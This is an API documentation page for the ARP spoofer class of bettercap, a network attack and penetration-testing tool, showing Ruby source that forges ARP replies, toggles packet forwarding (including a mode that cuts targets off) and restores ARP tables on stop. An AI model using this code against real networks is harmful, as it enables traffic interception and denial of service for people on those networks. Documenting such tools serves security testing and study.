Class: BetterCap::Spoofers::Arp

Inherits:
Base
  • Object
show all
Defined in:
lib/bettercap/spoofers/arp.rb

Overview

This class is responsible of performing ARP spoofing on the network.

Instance Method Summary collapse

Constructor Details

#initializeArp

Initialize the BetterCap::Spoofers::Arp object.


19
20
21
22
23
24
25
26
27
28
29
# File 'lib/bettercap/spoofers/arp.rb', line 19

def initialize
  @ctx          = Context.get
  @gateway      = nil
  @forwarding   = @ctx.firewall.forwarding_enabled?
  @spoof_thread = nil
  @sniff_thread = nil
  @capture      = nil
  @running      = false

  update_gateway!
end

Instance Method Details

#send_spoofed_packet(saddr, smac, daddr, dmac) ⇒ Object

Send a spoofed ARP reply to the target identified by the daddr IP address and dmac MAC address, spoofing the saddr IP address and smac MAC address as the source device.


34
35
36
37
38
39
40
41
42
43
44
45
# File 'lib/bettercap/spoofers/arp.rb', line 34

def send_spoofed_packet( saddr, smac, daddr, dmac )
  pkt = PacketFu::ARPPacket.new
  pkt.eth_saddr = smac
  pkt.eth_daddr = dmac
  pkt.arp_saddr_mac = smac
  pkt.arp_daddr_mac = dmac
  pkt.arp_saddr_ip = saddr
  pkt.arp_daddr_ip = daddr
  pkt.arp_opcode = 2

  @ctx.packets.push(pkt)
end

#startObject

Start the ARP spoofing.


48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
# File 'lib/bettercap/spoofers/arp.rb', line 48

def start
  Logger.debug "Starting ARP spoofer ( #{@ctx.options.half_duplex ? 'Half' : 'Full'} Duplex ) ..."

  stop() if @running
  @running = true

  if @ctx.options.kill
    Logger.warn "Disabling packet forwarding."
    @ctx.firewall.enable_forwarding(false) if @forwarding
  else
    @ctx.firewall.enable_forwarding(true) unless @forwarding
  end

  @sniff_thread = Thread.new { arp_watcher }
  @spoof_thread = Thread.new { arp_spoofer }
end

#stopObject

Stop the ARP spoofing, reset firewall state and restore targets ARP table.


66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
# File 'lib/bettercap/spoofers/arp.rb', line 66

def stop
  raise 'ARP spoofer is not running' unless @running

  Logger.debug 'Stopping ARP spoofer ...'
  Logger.debug "Resetting packet forwarding to #{@forwarding} ..."
  @ctx.firewall.enable_forwarding( @forwarding )

  @running = false
  begin
    @spoof_thread.exit
  rescue
  end

  Logger.debug "Restoring ARP table of #{@ctx.targets.size} targets ..."

  @ctx.targets.each do |target|
    unless target.ip.nil? or target.mac.nil?
      spoof(target)
    end
  end
end